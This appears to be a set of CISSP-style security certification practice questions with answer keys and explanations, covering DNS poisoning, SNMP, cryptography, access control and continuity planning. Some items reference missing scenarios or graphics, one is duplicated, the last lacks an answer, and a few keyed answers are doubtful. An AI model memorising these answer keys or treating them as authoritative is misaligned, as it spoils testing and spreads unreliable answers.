A. Capability Maturity Model Integration (CMMI) for development is a comprehensive integrated set of guidelines for developing products and software. It addresses the different phases of a software development life cycle, including concept definition, requirements analysis, design, development, integration, installation, operations, and maintenance and what should happen in each phase. The model describes procedures, principles, and practices that underlie software development process maturity. This model was developed to help software vendors improve their development processes by providing an evolutionary path from an ad hoc "fly by the seat of your pants" approach to a more disciplined and repeatable method that improves software quality, reduces the life cycle of development, provides better project management capabilities, allows for milestones to be created and met in a timely manner, and takes a more proactive approach than the less effective reactive approach.

What is the difference between configuration management and change management? A. Change management is a business process. Configuration management is an operational process. B. Change management is an operational process. Configuration management is a business process. C. There is no difference. Both terms refer to the same exact process. D. The difference is minimal, as they refer to different aspects of the same process.

A. Change management is a business process. Configuration management is an operational process.

Which of the following functions is the web server software currently carrying out, and what is an associated security concern Brad should address? A. Client-side validation The web server should carry out a secondary set of input validation rules on the presented data before processing it. B. Server-side includes validation The web server should carry out a secondary set of input validation rules on the presented data before processing it. C. Data Source Name logical naming access The web server should be carrying out a second set of reference integrity rules. D. Data Source Name logical naming access The web server should carry out a secondary set of input validation rules on the presented data before processing it

A. Client-side validation is being carried out. This procedure ensures that the data that is inserted into the form contains valid values before being sent to the web server for processing. The web server should not just rely upon client-side validation, but should also carry out a second set of procedures to ensure that the input values are not illegal and potentially malicious.

Which of the following classification levels are most commonly used in military environments? A. Confidential, Secret, Top Secret. B. Unclassified, sensitive but unclassified. C. Private, Proprietary, Sensitive. D. Unrestricted, for government use only.

A. Confidential, Secret, Top Secret.

Which is not a primary goal of QoS? A. content-based filtering is achieved. B. jitter and latency are managed C. Dedicated bandwidth is maintained D. different traffic types can coexist (voice, video, data)

A. Content-based filtering is achieved.

Which of the following is not true about continuous monitoring? A. It involves ad hoc processes that provide agility in responding to novel attacks. B. Its main goal is to support organizational risk management. C. It helps determine whether security controls remain effective. D. It relies on carefully chosen metrics and measurements.

A. Continuous monitoring is a deliberate, data-driven process supporting organizational risk management. One of the key questions it answers is: are controls still effective at mitigating risks? Continuous monitoring could potentially lead to a decision to implement specific ad hoc processes, but these would not really be part of continuous monitoring.

Use the following scenario to answer Questions 13-14. Tom is a new security manager who is responsible for reviewing the current software that the company has developed internally. He finds that some of the software is outdated, which causes performance and functionality issues. During his testing procedures he sees that when one program stops functioning, it negatively affects other programs on the same system. He also finds out that as systems run over a period of a month, they start to perform more slowly, but by rebooting the systems this issue goes away. Which of the following best describes a characteristic of the software that may be causing issues? A. Cooperative multitasking B. Preemptive multitasking C. Maskable interrupt use D. Nonmaskable interrupt use

A. Cooperative multitasking means that a developer of an application has to properly code his software to release system resources when the application is finished using them, or the other software running on the system could be negatively affected. In this type of situation an application could be poorly coded and not release system resources, which would negatively affect other software running on the system. In a preemptive multitasking environment, the operating system would have more control of system resource allocation and provide more protection for these types of situations.

Which of the following would you use to control the public distribution, reproduction, display, and adaptation of an original white paper written by your staff? A. Copyright B. Trademark C. Patent D. Trade secret

A. Copyright

A government contracting firm uses classification levels within its data networking environment. Which of the following best describes why this data classification program is put into place? A. Cost reduction mechanism. B. Regulatory noncompliance C. Fraud detection. D. Collusion activation.

A. Cost reduction mechanism.

What is the goal of cryptanalysis? A. To determine the strength of an algorithm B. To increase the substitution functions in a cryptographic algorithm C. To decrease the transposition functions in a cryptographic algorithm D. To determine the permutations used

A. Cryptanalysis is the process of trying to reverse-engineer a cryptosystem, with the possible goal of uncovering the key used. Once this key is uncovered, all other messages encrypted with this key can be accessed. Cryptanalysis is carried out by the white hats to test the strength of the algorithm.

DES performs how many rounds of transposition/permutation and substitution? A. 16 B. 32 C. 64 D. 56

A. DES carries out 16 rounds of mathematical computation on each 64-bit block of data it is responsible for encrypting. A round is a set of mathematical formulas used for encryption and decryption processes.

How many bits make up the effective length of the DES key? A. 56 B. 64 C. 32 D. 16

A. DES has a key size of 64 bits, but 8 bits are used for parity, so the true key size is 56 bits. Remember that DEA is the algorithm used for the DES standard, so DEA also has a true key size of 56 bits, because we are actually talking about the same algorithm here. DES is really the standard, and DEA is the algorithm.

Which of the following protocols blurs the lines between the OSI model layers, performing the tasks of several at once? A. Distributed Network Protocol 3 (DNP3) B. File Transfer Protocol (FTP) C. Transmission Control Protocol (TCP) D. Domain Name System (DNS)

A. DNP3 was designed for use in SCADA systems, which were historically configured in a flat network hierarchy, with devices serially connected to each other. As such, modern routing functionality was not required. Consequently, it behaves much like a serial link layer protocol, but also performs the function of a transport layer protocol as well.

DNS is a popular target for attackers due to its strategic role on the Internet. What type of attack uses recursive queries to poison the cache of a DNS server? A. DNS hijacking B. Manipulation of the hosts file C. Social engineering D. Domain litigation

A. DNS plays a strategic role in the transmission of traffic on the Internet. The DNS directs traffic to the appropriate address by mapping domain names to their corresponding IP addresses. DNS queries can be classified as either recursive or iterative. In a recursive query the DNS server often forwards the query to another server and returns the proper response to the inquirer. In an iterative query, the DNS server responds with an address for another DNS server that might be able to answer the question, and the client then proceeds to ask the new DNS server. Attackers use recursive queries to poison the cache of a DNS server. In this manner, attackers can point systems to a website that they control and that contains malware or some other form of attack. Here's how it works: An attacker sends a recursive query to a victim DNS server asking for the IP address of the domain www.logicalsecurity.com. The DNS server forwards the query to another DNS server. However, before the other DNS server responds, the attacker injects his own IP address. The victim server accepts the IP address and stores it in its cache for a specific period of time. The next time a system queries the server to resolve www.logicalsecurity.com to its IP address, the server will direct users to the attacker's IP address. This is called DNS spoofing or DNS poisoning.

Which of the following is the best countermeasure for the attack type addressed in the scenario? A. DNSSEC B. IPSec C. Split server configurations D. Disabling zone transfers

A. DNSSEC protects DNS servers from forged DNS information, which is commonly used to carry out DNS cache poisoning attacks. If DNSSEC is implemented, then all responses that the server receives will be verified through digital signatures. This helps ensure that an attacker cannot provide a DNS server with incorrect information, which would point the victim to a malicious website.

Which of the following shows the sequence of the OSI as layers, 2, 5, 7,4 and 3? A. Data link, session, application, transport, and network. B. Data link, transport, application, session and network. C. Network, session, application, network, and transport. D. Network, transport, application, session, and presentation..

A. Data link, session, application, transport, and network.

Which entity provides formal authorization on access decisions? A. Data owner B. Data custodian C. Data user D. Data warehouse.

A. Data owner.

Which entity provides formal authorization on access decisions? A. Data owner. B. Data custodian. C. Data user. D. Data warehouse

A. Data owner.

Which of the following best describes a technical control for dealing with the risks presented by data remanence? A. Encryption B. Data retention policies C. File deletion D. Using solid-state drives (SSD)

A. Data remanence refers to the persistence of data on storage media after it has been deleted. Encrypting this data is the best of the listed choices because the recoverable data will be meaningless to an adversary. Retention policies are important, but are considered administrative controls that don't deal with remanence directly. Simply deleting the file will not normally render the data unrecoverable, nor will the use of SSDs even though these devices will sometimes (though not always) make it difficult to recover the deleted data.

A High-level programming language: A. Decreases the total amount of code written. B. Allows programmers to define syntax C. Requires programmer-controlled storage management. D. Enforces coding standards.

A. Decreases the total amount of code written.

Which of the following is a program counter that points to the memory location which holds the next instruction to be carried out? A. Dedicated register. B. Status register. C. TOC/TOU D. Privileged program.

A. Dedicated register.

An attack that sends packets with the same source and destination addresses would be considered what type of attack? A. Denial-of-service attack. B. Asynchronous attack. C. Distributed attack. D. Timing attack.

A. Denial-of-service attack.

Which of the following best describes the term DevOps? A. The practice of incorporating development, IT, and quality assurance (QA) staff into software development projects. B. A multidisciplinary development team with representatives from many or all the stakeholder populations. C. The operationalization of software development activities to support just-in-time delivery. D. A software development methodology that relies more on the use of operational prototypes than on extensive upfront planning.

A. DevOps is a type of integrated product team (IPT) that focuses on three communities: software development, IT operations, and quality assurance. The idea is to reduce the friction that oftentimes exists between the developers and IT staff in order to improve quality and velocity.

There are several different types of centralized access control protocols. Which of the following is illustrated in the graphic that follows? A. Diameter B. Watchdog C. RADIUS D. TACACS+

A. Diameter is an authentication, authorization, and auditing (AAA) protocol that provides the same type of functionality as RADIUS and TACACS+ but also provides more flexibility and capabilities to meet the new demands of today's complex and diverse networks. At one time, all remote communication took place over Point-to-Point Protocol (PPP) and Serial Line Internet Protocol (SLIP) connections, and users authenticated themselves through Password Authentication Protocol (PAP) or Challenge Handshake Authentication Protocol (CHAP). Technology has become much more complicated and there are more devices and protocols to choose from than ever before. The Diameter protocol allows wireless devices, smartphones, and other devices to be able to authenticate themselves to networks using roaming protocols, Mobile IP, Ethernet over PPP, Voice over IP (VoIP), and others.

Which of the following correctly describes direct access and sequential access storage devices? A. Any point on a direct access storage device may be promptly reached, whereas every point in between the current position and the desired position of a sequential access storage device must be traversed in order to reach the desired position. B. RAIT is an example of a direct access storage device, while RAID is an example of a sequential access storage device. C. MAID is a direct access storage device, while RAID is an example of a sequential access storage device. D. As an example of sequential access storage, tape drives are faster than direct access storage devices.

A. Direct access storage device (DASD) is a general term for magnetic disk storage devices, which historically have been used in mainframe and minicomputer (mid-range computer) environments. A redundant array of independent disks (RAID) is a type of DASD. The key distinction between DASDs and sequential access storage devices (SASDs) is that any point on a DASD may be promptly reached, whereas every point in between the current position and the desired position of an SASD must be traversed in order to reach the desired position. Tape drives are SASDs. Tape storage is the lowest-cost option for very large amounts of data but is very slow compared to disk storage.

Which of the following would not require updated documentation? A. An antivirus signature update B. Reconfiguration of a server C. A change in security policy D. The installation of a patch to a production server

A. Documentation is a very important part of the change control process. If things are not properly documented, employees will forget what actually took place with each device. If the environment needs to be rebuilt, for example, it may be done incorrectly if the procedure was poorly or improperly documented. When new changes need to be implemented, the current infrastructure may not be totally understood. Continually documenting when virus signatures are updated would be overkill. The other answers contain events that certainly require documentation.

Which of the following statements is true about employee duress? A. Its risks can be mitigated by installing panic buttons. B. Its risks can be mitigated by installing panic rooms. C. Its risks can be mitigated by enforcing forced vacations. D. It can more easily be detected using the right clipping levels.

A. Duress is the use of threats or violence against someone in order to force them to do something they don't want to do. A popular example of a countermeasure for duress is the use of panic buttons by bank tellers. A panic room could conceivably be another solution, but it would only work if employees are able to get in and lock the door before an assailant can stop them, which makes it a generally poor approach.

A CISSP candidate signs an ethics statement prior to taking the CISSP examination. Which of the following would be a violation of the (ISC)2 Code of Ethics that could cause the candidate to lose his or her certification? A. E-mailing information or comments about the exam to other CISSP candidates B. Submitting comments on the questions of the exam to (ISC)2 C. Submitting comments to the board of directors regarding the test and content of the class D. Conducting a presentation about the CISSP certification and what the certification means

A. E-mailing information or comments about the exam to other CISSP candidates

Operating systems may not work on systems with specific processors. Which of the following best describes why one operating system may work on an Intel processor but not on an AMD processor? A. The operating system was not developed to work within the architecture of a specific processor and cannot use that specific processor instruction set. B. The operating system was developed before the new processor architecture was released, and thus is not backward compatible. C. The operating system is programmed to use a different instruction set. D. The operating system is platform dependent, and thus can work only on one specific processor family.

A. Each CPU type has a specific architecture and set of instructions that it can carry out. The operating system must be designed to work within this CPU architecture. This is why one operating system may work on an Intel processor but not on an AMD processor.

Which of the following has an incorrect definition mapping? i.Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) Team-oriented approach that assesses organizational and IT risks through facilitated workshops ii.ISACA Risk IT Aims to bridge the gap between generic frameworks and IT-centric ones iii.ISO/IEC 27005 International standard for the implementation of a risk management program that integrates into an information security management system (ISMS) iv.Failure Modes and Effect Analysis (FMEA) Approach that dissects a component into its basic functions to identify flaws and those flaws' effects v. Fault tree analysis Approach to map specific flaws to root causes in complex systems A. None of them B. ii C. iii, iv D. v

A. Each answer lists the correct definition mapping.

There are several types of redundant technologies that can be put into place. What type of technology is shown in the graphic that follows? A. Tape vaulting B. Remote journaling C. Electronic vaulting D. Redundant site

A. Each site should have a full set of the most current and updated information and files, and a commonly used software backup technology is referred to as tape vaulting. Many businesses back up their data to tapes that are then manually transferred to an offsite facility by a courier or an employee. With automatic tape vaulting, the data is sent over a serial line to a backup tape system at the offsite facility. The company that maintains the offsite facility maintains the systems and changes out tapes when necessary. Data can be quickly backed up and retrieved when necessary. This technology reduces the manual steps in the traditional tape backup procedures. Basic vaulting of tape data involves sending backup tapes to an offsite location, but a manual process can be error prone. Electronic tape vaulting transmits data over a network to tape devices located at an alternate data center. Electronic tape vaulting improves recovery speed and reduces errors, and backups can be run more frequently.

Security awareness training programs have all of the following characteristics, except: A. Enforced by department heads. B. Simple, clear, and concise C. ongoing D. Entertaining and positive

A. Enforced by department heads.

Which of the following best describes a continuity of operations plan? A. Establishes session management and a headquarters after a disaster. Outlines roles and authorities, orders of succession, and individual role tasks. B. Plan for systems, networks, and major applications recovery procedures after disruptions. A contingency plan should be developed for each major system and application. C. includes internal and external communication structure and roles. Identifies specific individuals who will communicate with external entities. Contains predeveloped statements that are to be released. D. Focuses on malware, hackers, intrusions, attacks, and other security issues. Outlines procedures for incident response.

A. Establishes session management and a headquarters after a disaster. Outlines roles and authorities, orders of succession, and individual role tasks.

Which of the following statements describes a "converged" protocol? A. It is a term used to describe a situation where two otherwise independent protocols—often functioning at the same layer—become one, as with Fibre Channel (FC) over Ethernet (FCoE). B. It is any situation where one protocol is encapsulated with another, as with TCP inside of IP (TCP/IP). C. It refers to when two protocols at the same layer begin to do essentially the same thing, such as HTTP and HTTPS. D. It is any situation where a protocol is encapsulated within another protocol in a way that bends or breaks the OSI model, as IPv6 over generic routing encapsulation (GRE) over IPv4.

A. FCoE, in allowing older Fibre Channel frames to ride over Ethernet frames, is an example of a converged protocol, as they are otherwise both data link protocols.

Device backup and other availability solutions are chosen to balance the value of having information available against the cost of keeping that information available. Which of the following best describes fault-tolerant technologies? A. They are among the most expensive solutions and are usually only for the most mission-critical information. B. They help service providers identify appropriate availability services for a specific customer. C. They are required to maintain integrity, regardless of the other technologies in place. D. They allow a failed component to be replaced while the system continues to run.

A. Fault-tolerant technologies keep information available not only against individual storage device faults, but even against whole system failures. Fault tolerance is among the most expensive possible solutions for availability and is commonly justified only for the most mission-critical information. All technology will eventually experience a failure of some form. A company that would suffer irreparable harm from any unplanned downtime can justify paying the high cost for fault-tolerant systems.

Which of the following is the best solution to meet the company's need for broadband wireless connectivity? A. WiMAX B. IEEE 802.12 C. WPA2 D. IEEE 802.15

A. IEEE 802.16 is a MAN wireless standard that allows for wireless traffic to cover a wide geographical area. This technology is also referred to as broadband wireless access. The commercial name for 802.16 is WiMAX.

ISO/IEC 27031:2011 is an international standard for business continuity that organizations can follow. Which of the following is a correct characteristic of this standard? A. Guidelines for information and communications technology readiness for business continuity B. ISO/IEC standard that is a component of the overall BS 7999 series C. Standard that was developed by NIST and evolved to be an international standard D. Developed primarily for the financial sector

A. ISO/IEC 27031:2011 is a set of guidelines for information and communications technology readiness for business continuity. This ISO/IEC standard is a component of the overall ISO/IEC 27000 series.

Pete is a new security manager at a financial institution that develops its own internal software for specific proprietary functionality. The financial institution has several locations distributed throughout the world and has bought several individual companies over the last ten years, each with its own heterogeneous environment. Since each purchased company had its own unique environment, it has been difficult to develop and deploy internally developed software in an effective manner that meets all the necessary business unit requirements. Which of the following best describes a standard that Pete should ensure the software development team starts to implement so that various business needs can be met? A. ISO/IEC/IEEE 42010 B. Common Criteria C. ISO/IEC 43010 D. ISO/IEC 15408

A. ISO/IEC/IEEE 42010 is an international standard that outlines specifications for system architecture frameworks and architecture languages. It allows for systems to be developed in a manner that addresses all of the stakeholder's concerns.

The discovery of electronically stored information (ESI), or e-discovery, can be defined as a process for producing admissible evidence for court proceedings. The electronic discovery reference model (EDRM) defines which of the following series of steps for e-discovery? A. Identification, Preservation, Collection, Processing, Review, Analysis, Production, and Presentation. B. Identification, Analysis. Collection, and Documentation. C. Collection, Identification, Manipulation, Analysis, Review, and Presentation. D. Collection, Processing, Analysis, Compilation, Distribution, and Recovery.

A. Identification, Preservation, Collection, Processing, Review, Analysis, Production, and Presentation.

Bob has noticed that one of the network switches has been acting strangely over the last week. Bob installed a network protocol analyzer to monitor the traffic going to the specific switch. He has identified UDP traffic coming from an outside source using the destination port 161. Which of the following best describes what is most likely taking place? A. An attacker is modifying the switch SNMP MIB. B. An attacker is carrying out a selective DoS attack. C. An attacker is manipulating the ARP cache. D. An attacker is carrying out an injection attack.

A. If an attacker can uncover the read-write string, she could change values held within the MIB, which could reconfigure the device. The usual default read-only community string is "public" and the read-write string is "private." Many companies do not change these, so anyone who can connect to port 161 can read the status information of a device and potentially reconfigure it. The SNMP ports (161 and 162) should not be open to untrusted networks, like the Internet, and if needed they should be filtered to ensure only authorized individuals can connect to them.

Which of the following best describes an item the software development team needs to address to ensure that drivers cannot be loaded in an unauthorized manner? A. Improved security kernel processes B. Improved security perimeter processes C. Improved application programming interface processes D. Improved garbage collection processes

A. If device drivers can be loaded improperly, then either the access control rules outlined within the reference monitor need to be improved upon or the current rules need to be better enforced through the security kernel processes. Only authorized subjects should be able to install sensitive software components that run within ring 0 of a system.

Tom has been told that he has to reduce staff from the help-desk team. Which of the following technologies can help with the company's help-desk budgetary issues? A. Self-service password support B. RADIUS implementation C. Reduction of authoritative IdM sources D. Implement a role-based access control model

A. If help-desk staff is spending too much time with password resetting, then a technology should be implemented to reduce the amount of time paid staff is spending on this task. The more tasks that can be automated through technology, the less that has to be spent on staff. The following are password management functionalities that are included in most IdM products: Password synchronization Reduces the complexity of keeping up with different passwords for different systems. Self-service password reset Reduces help-desk call volumes by allowing users to reset their own passwords. Assisted password reset Reduces the resolution process for password issues for the help desk. This may include authentication with other types of authentication mechanisms (biometrics, tokens).

A company that wishes to maximize data writing efficiency should ____. A. Implement data striping. B. Upsize disk drives. C. limit user access. D. Mirror critical drives.

A. Implement data striping.

Which of the following describes a parallel test during disaster recovery testing? A. It is performed to ensure that some systems will run at the alternate site. B. All departments receive a copy of the disaster recovery plan to review it for completeness. C. Representatives from each department come together and go through the test collectively. D. Normal operations are shut down.

A. In a parallel test, some systems are run at the alternate site and results are compared with how processing takes place at the primary site. This is to ensure the systems work at the alternate site and productivity is not affected. This also extends the previous test and allows the team to walk through the steps of setting up and configuring systems at the offsite facility.

Which could be considered a single point of failure within a single sign-on implementation? A. Authentication server B. User's workstation C. Logon credentials D. RADIUS

A. In a single sign-on technology, all users are authenticating to one source. If that source goes down, authentication requests cannot be processed.

Which of the following correctly best describes an object-oriented database? A. When application queries for data, it receives both the data and the procedure. B. It is structured similarly to a mesh network for redundancy and fast data retrieval. C. Subjects must have knowledge of the well-defined access path in order to access data. D. The relationships between data entities provide the framework for organizing data.

A. In an object-oriented database, objects are instantiated when needed, and the data and procedure (called method) go with the object when it is requested. This differs from a relational database, in which the application uses its own procedures to obtain and process data when retrieved from the database.

Which of the following best describes the role of the values that is allowing for patterns as described in the scenario? A. Initialization vector B. One-time password C. Master symmetric key D. Subkey

A. Initialization vectors (IVs) are random values that are used with algorithms to ensure patterns are not created during the encryption process. They are used with keys and do not need to be encrypted when being sent to the destination. If IVs are not used, then two identical plaintext values that are encrypted with the same key will create the same ciphertext. Providing attackers with these types of patterns can make their job easier in breaking the encryption method and uncovering the key.

Both de facto and proprietary interior protocols are in use today. Which of the following is a proprietary interior protocol that chooses the best path between the source and destination? A. IGRP B. RIP C. BGP D. OSPF

A. Interior Gateway Routing Protocol (IGRP) is a distance-vector routing protocol that was developed by, and is proprietary to, Cisco Systems. Whereas Routing Information Protocol (RIP) uses one criterion to find the best path between the source and the destination, IGRP uses five criteria to make a "best route" decision. A network administrator can set weights on these different metrics so that the protocol works best in that specific environment.

A small medical institution's IT security team has become overwhelmed with having to operate and maintain IDSs, firewalls, enterprise-wide antimalware solutions, data leak prevention technologies, and centralized log management. Which of the following best describes what type of solution this organization should implement to allow for standardized and streamlined security operations? A. Unified threat management B. Continuous monitoring technology C. Centralized access control systems D. Cloud-based security solution

A. It has become very challenging to manage the long laundry list of security solutions almost every network needs to have in place. The list includes, but is not limited to, firewalls, antimalware, antispam, IDS/IPS, content filtering, data leak prevention, VPN capabilities, and continuous monitoring and reporting. Unified threat management (UTM) appliance products have been developed that provide all (or many) of these functionalities in a single network appliance. The goals of UTM are simplicity, streamlined installation and maintenance, centralized control, and the ability to understand a network's security from a holistic point of view. Each security product vendor has its own UTM solution, but each has similar goals of allowing administrators to monitor and manage a variety of security-related applications and products through a single management console.

Which of the following best describes "premisses" identity management (IDM)? A. It is an architecture for managing all users' identities and authentications whereby the resources for doing so are constructed, installed, and maintained under the enterprise's physical control, including all the necessary hardware and software. B. It is an architecture for managing all users' identities and authentications whereby the resources for doing so are installed, configured, and maintained by a solution provider. C. It is a solution for managing user identities and authentications for internet-based users who need access to internal, on-premises corporate resources. D. it is a solution for managing on-premises user identities and authentications for access to external, internet-based resources.

A. It is an architecture for managing all users' identities and authentications whereby the resources for doing so are constructed, installed, and maintained under the enterprise's physical control, including all the necessary hardware and software.

packet-switching infrastructures are safer environments because ____/ A. It is harder to sniff traffic since the computers have virtual private connections. B. They are just as unsafe as non-switched environments. C. The data link encryption does not permit wire-tapping. D. Switches are more intelligent than bridges and implement security mechanisms.

A. It is harder to sniff traffic since the computers have virtual private connections.

Which of the following is an industry standard for providing repositories for security-related data, such as cryptographic keys, passwords, or user IDs? A. LDAP B CHAP C. PKI D. SNMP

A. LDAP

Which is not true of polycarbonate acrylic windows? A. Less resistant to breakage than standard plate windows. B. Produces toxic flames if burned C. Can be cut, sawed, or drilled D. Provides more protection than standard acrylic windows.

A. Less resistant to breakage than standard plate windows.

18 The operating system access controls comprise which of the following? A. Logical controls B. Physical controls C. Administrative controls D. Compensating controls

A. Logical controls

Which of the following is true of management reviews? A. They happen periodically and include results of audits as a key input. B. They happen in an ad hoc manner as the needs of the organization dictate. C. They are normally conducted by mid-level managers, but their reports are presented to the key business leaders. D. They are focused on assessing the management of information systems.

A. Management reviews work best when they are regularly scheduled events involving the key organizational leaders, because this allows the subordinate leaders to plan and conduct the assessments, such as audits that provide inputs to the review.

Which of the following is not a true statement about CCTV lenses? A. Lenses that have a manual iris should be used in outside monitoring. B.. Zoom lenses will carry out focus functionality automatically. C. Depth of field increases as the size of the lens opening decreases. D. Depth of field increases as the focal length of the lens decreases.

A. Manual iris lenses have a ring around the CCTV lens that can be manually turned and controlled. A lens that has a manual iris would be used in an area that has fixed lighting, since the iris cannot self-adjust to changes of light. An auto iris lens should be used in environments where the light changes, such as an outdoor setting. As the environment brightens, this is sensed by the iris, which automatically adjusts itself. Security personnel will configure the CCTV to have a specific fixed exposure value, which the iris is responsible for maintaining. The other answers are true.

Mark works for a large corporation operating in multiple countries worldwide. He is reviewing his company's policies and procedures dealing with data breaches. Which of the following is an issue that he must take into consideration? A. Each country may or may not have unique notification requirements. B. All breaches must be announced to affected parties within 24 hours. C. Breach notification is a "best effort" process and not a guaranteed process. D. Breach notifications are avoidable if all PII is removed from data stores.

A. Many (but not all) countries have data breach notification requirements, and these vary greatly in their specifics. While some countries have very strict requirements, others have more lax requirement, or lack them altogether. This requires the security professional to ensure compliance in the appropriate territory. Applying the most stringent rules universally (e.g., 24-hour notification) is usually not a good idea from a business perspective. The term "best effort" is not acceptable in countries with strict rules, nor is the notion that personally identifiable information (PII) is the only type of data that would trigger a mandatory notification.

Which item is not part of a Kerberos authentication implementation? A. Message authentication code B. Ticket granting service C. Authentication service D. Users, programs, and services

A. Message authentication code (MAC) is a cryptographic function and is not a key component of Kerberos. Kerberos is made up of a KDC, a realm of principals (users, services, applications, and devices), an authentication service, tickets, and a ticket granting service.

Suppose you want to study the actions an adversary may attempt against your system and test the effectiveness of the controls you have emplaced to mitigate the associated risks. Which of the following approaches would best allow you to accomplish this goal? A. Misuse case testing B. Use case testing C. Real user monitoring (RUM) D. Fuzzing

A. Misuse case testing allows us to document both an adversary's desired actions on a system and the controls that are meant to thwart that adversary. It is similar to developing use cases, but with a malicious user's actions in mind instead of those of legitimate users.

Which of the following is not a result of a penetration test? A. Modify access control permissions B. Identify network vulnerabilities C. Evaluates IDS effectiveness D. Evaluate incident response procedures.

A. Modify access control permissions

Virtual storage combines RAM and secondary storage for system memory. Which of the following is a security concern pertaining to virtual storage? A. More than one process uses the same resource. B. It allows cookies to remain persistent in memory. C. It allows for side-channel attacks to take place. D. Two processes can carry out a denial of service.

A. More than one process uses the same resource.

Which of the following is the best description of directories that are used in identity management technology? A. Most are hierarchical and follow the X.500 standard. B. Most have a flat architecture and follow the X.400 standard. C. Most have moved away from LDAP. D. Many use LDAP.

A. Most enterprises have some type of directory that contains information pertaining to the company's network resources and users. Most directories follow a hierarchical database format, based on the X.500 standard, and a type of protocol, as in Lightweight Directory Access Protocol (LDAP), that allows subjects and applications to interact with the directory. Applications can request information about a particular user by making an LDAP request to the directory, and users can request information about a specific resource by using a similar request.

Many applications are able to transmit over one physical medium at the same time by the use of ____. A. Multiplexing. B. Routing. C. Forwarding. D. Asynchronous protocols.

A. Multiplexing.

Which of the following antimalware detection methods is the most recent to the industry and monitors suspicious code as it executes within the operating system? A. Behavior blocking B. Fingerprint detection C. Signature-based detection D. Heuristic detection

A. Of the methods listed, behavior blocking is the most recent evolution in antimalware detection. Behavior blocking allows suspicious code to execute within the operating system and watches its interactions looking for suspicious activities. These activities include writing to startup files or the Run keys in the Registry; opening, deleting, or modifying files; scripting e-mail messages to send executable code; and creating or modifying macros and scripts. If the antimalware program detects some of these potentially malicious activities, it can terminate the software and provide a message to the user. A drawback to behavior blockers is that the malicious code must actually execute in real time. This type of constant monitoring also requires a high level of system resources.

Charlie uses PGP on his Linux-based e-mail client. His friend Dave uses S/MIME on his Windows-based e-mail. Charlie is unable to send an encrypted e-mail to Dave. What is the likely reason? A. PGP and S/MIME are incompatible. B. Each has a different secret key. C. Each is using a different CA. D. There is not enough information to determine the likely reason.

A. PGP uses a decentralized web of trust for its PKI, while S/MIME relies on centralized CAs. The two systems are, therefore, incompatible with each other.

On a Tuesday morning, Jami is summoned to the office of the security director, where she finds six of her peers from other departments. The security director gives them instructions about an event that will be taking place in two weeks. Each of the individuals will be responsible for removing specific systems from the facility, bringing them to the offsite facility, and implementing them. Each individual will need to test the installed systems and ensure the configurations are correct for production activities. What event is Jami about to take part in? A. Parallel test B. Full-interruption test C. Simulation test D. Structured walk-through test

A. Parallel tests are similar to simulation tests, except that parallel tests include moving some of the systems to the offsite facility. Simulation tests stop just short of the move. Parallel tests are effective because they ensure that specific systems work at the new location, but the test itself does not interfere with business operations at the main facility.

Which of the following techniques or set of techniques is used to deter database inference attacks? A. Partitioning, cell suppression, and noise and perturbation B. Controlling access to the data dictionary C. Partitioning, cell suppression, and small query sets D. Partitioning, noise and perturbation, and small query sets

A. Partitioning means to logically split the database into parts. Views then dictate which users can view specific parts. Cell suppression means that specific cells are not viewable by certain users. And noise and perturbation is when bogus information is inserted into the database to try to give potential attackers incorrect information.

Which of the following is a directive issued by senior management that identifies goals, measurements, and responsibilities? A. Policy B. Procedure C. Standard. D. baseline.

A. Policy.

Which of the following is currently the most recommended water system for a computer room? A. Preaction B. Wet pipe C. Dry pipe D. Deluge.

A. Preaction

In secure computing systems, why is there a logical form of separation used between processes? A. Processes are contained within their own security domains so each does not make unauthorized accesses to other processes or their resources. B. Processes are contained within their own security perimeter so they can only access protection levels above them. C. Processes are contained within their own security perimeter so they can only access protection levels equal to them. D. The separation is hardware and not logical in nature.

A. Processes are contained within their own security domains so each does not make unauthorized accesses to other processes or their resources.

Under which of the following models are rights implicitly assigned? A. RBAC. B. DAC. C. MAC. D. Rule-based.

A. RBAC.

What is an advantage of RSA over DSA? A. It can provide digital signature and encryption functionality. B. It uses fewer resources and encrypts faster because it uses symmetric keys. C. It is a block cipher rather than a stream cipher. D. It employs a one-time encryption pad.

A. RSA can be used for data encryption, key exchange, and digital signatures. DSA can be used only for digital signatures.

Use the following scenario to answer Questions 141-142. Ron is in charge of updating his company's business continuity and disaster recovery plans and processes. After conducting a business impact analysis, his team has told him that if the company's e-commerce payment gateway was unable to process payments for 24 hours or more, this could drastically affect the survivability of the company. The analysis indicates that after an outage, the payment gateway and payment processing should be restored within 13 hours. Ron's team needs to integrate solutions that provide redundancy, fault tolerance, and failover capability. 141 In the scenario, what does the 24-hour time period represent and what does the 13-hour time period represent? A. Maximum tolerable downtime, recovery time objective B. Recovery time objective, maximum tolerable downtime C. Maximum tolerable downtime, recovery data period D. Recovery time objective, data recovery period

A. RTO is an allowable amount of downtime, and the MTD is a time period that represents the inability to recover. The RTO value is smaller than the MTD value because the MTD value represents the time after which an inability to recover significant operations will mean severe and perhaps irreparable damage to the organization's reputation or bottom line. The RTO assumes that there is a period of acceptable downtime. This means that a company can be out of production for a certain period of time (RTO) and still get back on its feet. But if the company cannot get production up and running within the MTD window, the company is sinking too fast to properly recover.

Monica is the IT director of a large printing press. She has been made aware of several attempts of brute force password attacks within the past weeks. Which of the following reactions would suit monica best? A. reduce clipping level. B.. Find a more effective encryption mechanism C. increase employee awareness through warning banners and training D. implement spyware protection that is integrated into the current antivirus product.

A. Reduce the clipping level.

Which of the following best describes the mitigation of data remanence by an overwriting process? A. Replacing the 1's and 0's that represent data on storage media with random or fixed patterns of 1's and 0's B. Converting the 1's and 0's that represent data with the output of a cryptographic function C. Removing or reducing the magnetic field patterns on conventional disk drives or tapes D. Exposing storage media to caustic or corrosive chemicals that render it unusable

A. Replacing the 1's and 0's that represent data on storage media with random or fixed patterns of 1's and 0's

Business continuity management means taking the necessary steps to increase a company's _____ to service disruption. A. resilience B. perceived reaction C. attitude D. means.

A. Resilience.

A rule-based IDS takes a different approach than a signature-based or anomaly-based system. Which of the following is characteristic of a rule-based IDS? A. Uses IF/THEN programming within expert systems B. Identifies protocols used outside of their common bounds C. Compares patterns to several activities at once D. Can detect new attacks

